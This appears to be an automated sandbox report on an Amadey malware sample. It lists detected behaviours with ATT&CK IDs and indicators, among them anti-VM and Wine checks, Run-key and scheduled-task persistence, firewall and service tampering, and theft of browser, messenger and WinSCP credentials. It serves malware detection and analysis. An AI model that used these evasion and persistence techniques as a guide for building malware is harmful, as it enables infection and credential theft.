amadey | 078f586ebb8a22305540fb5982b2521f1b82e4317f286e13bab680fff0a9d164

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	CCB8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	13E8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorgu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ladas.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
167	2272	cmd.exe
174	4592	rundll32.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4284	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ladas.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ladas.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CCB8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CCB8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	13E8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	13E8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorgu.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation	explorgu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation	B864.exe

Deletes itself 1 IoCs

pid	Process
3496	Process not Found

Executes dropped EXE 22 IoCs

pid	Process
2008	B864.exe
3992	B864.exe
3724	B864.exe
3328	B864.exe
5036	CCB8.exe
3516	EDED.exe
3460	FF93.exe
4588	kiliqiuang.exe
4520	FF93.exe
3536	13E8.exe
4368	1706.exe
3056	explorgu.exe
5052	new.exe
3096	RegAsm.exe
5016	viewer.exe
4588	chrome.exe
2120	ladas.exe
4076	dotu.exe
1600	msedge.exe
1808	europe.exe
2720	RegAsm.exe
528	stub.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Software\Wine	13E8.exe
Key opened	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Software\Wine	explorgu.exe
Key opened	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Software\Wine	ladas.exe

Loads dropped DLL 48 IoCs

pid	Process
4588	kiliqiuang.exe
976	cmd.exe
2272	cmd.exe
4592	rundll32.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe
528	stub.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3712	icacls.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000e000000023140-63.dat	themida
behavioral1/memory/5036-66-0x0000000000F30000-0x0000000001542000-memory.dmp	themida
behavioral1/memory/5036-68-0x0000000000F30000-0x0000000001542000-memory.dmp	themida
behavioral1/memory/5036-69-0x0000000000F30000-0x0000000001542000-memory.dmp	themida
behavioral1/memory/5036-70-0x0000000000F30000-0x0000000001542000-memory.dmp	themida
behavioral1/memory/5036-71-0x0000000000F30000-0x0000000001542000-memory.dmp	themida
behavioral1/memory/5036-72-0x0000000000F30000-0x0000000001542000-memory.dmp	themida
behavioral1/memory/5036-73-0x0000000000F30000-0x0000000001542000-memory.dmp	themida
behavioral1/memory/5036-76-0x0000000000F30000-0x0000000001542000-memory.dmp	themida

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-BAHBFO = "\"C:\\ProgramData\\viewer\\viewer.exe\""	viewer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ladas.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000597001\\ladas.exe"	explorgu.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dotu.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000621001\\dotu.exe"	explorgu.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe"	dotu.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\19ab23fa-5b88-4e65-8190-eb3aaefe7342\\B864.exe\" --AutoStart"	B864.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-BAHBFO = "\"C:\\ProgramData\\viewer\\viewer.exe\""	RegAsm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-BAHBFO = "\"C:\\ProgramData\\viewer\\viewer.exe\""	RegAsm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-BAHBFO = "\"C:\\ProgramData\\viewer\\viewer.exe\""	viewer.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	CCB8.exe

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
651	ipinfo.io
892	ipinfo.io
60	api.2ip.ua
237	ipinfo.io
650	ipinfo.io
891	ipinfo.io
59	api.2ip.ua
236	ipinfo.io
241	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000009da4-2650.dat	autoit_exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	ladas.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
5036	CCB8.exe
3536	13E8.exe
3056	explorgu.exe
2120	ladas.exe
4076	dotu.exe
4076	dotu.exe
4076	dotu.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2008 set thread context of 3992	2008	B864.exe	99
PID 3724 set thread context of 3328	3724	B864.exe	103
PID 4588 set thread context of 4884	4588	kiliqiuang.exe	129
PID 5016 set thread context of 3588	5016	viewer.exe	138

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	FF93.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorgu.job	13E8.exe

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2356	sc.exe
864	sc.exe
5608	sc.exe
1268	sc.exe
5476	sc.exe
5548	sc.exe
5116	sc.exe
5448	sc.exe
2760	sc.exe

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0006000000023290-411.dat	pyinstaller
behavioral1/files/0x0006000000023290-437.dat	pyinstaller
behavioral1/files/0x0006000000023290-1170.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
2640	3328	WerFault.exe	103
1876	5052	WerFault.exe	130
6248	5572	WerFault.exe	217
6684	5608	WerFault.exe	232
6488	5608	WerFault.exe	232
3592	6576	WerFault.exe	273
5480	1240	WerFault.exe	352
10560	8124	WerFault.exe	556
10600	544	WerFault.exe	549

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6958ACC382E71103A0B83D20BBBB37D2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6958ACC382E71103A0B83D20BBBB37D2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6958ACC382E71103A0B83D20BBBB37D2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2928	schtasks.exe
5316	schtasks.exe
7228	schtasks.exe
5480	schtasks.exe
3600	schtasks.exe
2096	schtasks.exe
7912	schtasks.exe
5884	schtasks.exe
4680	schtasks.exe
4660	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
400	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
2124	tasklist.exe
7728	tasklist.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Software\Microsoft\Internet Explorer\Toolbar	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Process not Found

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	FF93.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ladas.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	FF93.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	FF93.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	ladas.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	FF93.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	ladas.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	ladas.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	FF93.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	FF93.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	ladas.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	FF93.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	FF93.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	ladas.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	FF93.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	ladas.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	FF93.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	FF93.exe

Modifies registry class 26 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c004346534616003100000000005558d556120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe5558d556575897762e00000095e1010000000100000000000000000000000000000034c521014100700070004400610074006100000042000000	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000008d6f505eb464da013d6eb739bf64da011c358c6a6866da0114000000	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000005758fc76100054656d7000003a0009000400efbe5558d5565758fc762e000000a9e1010000000100000000000000000000000000000037927600540065006d007000000014000000	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000005758fb7610004c6f63616c003c0009000400efbe5558d5565758fb762e000000a8e101000000010000000000000000000000000000002ece1c014c006f00630061006c00000014000000	Process not Found
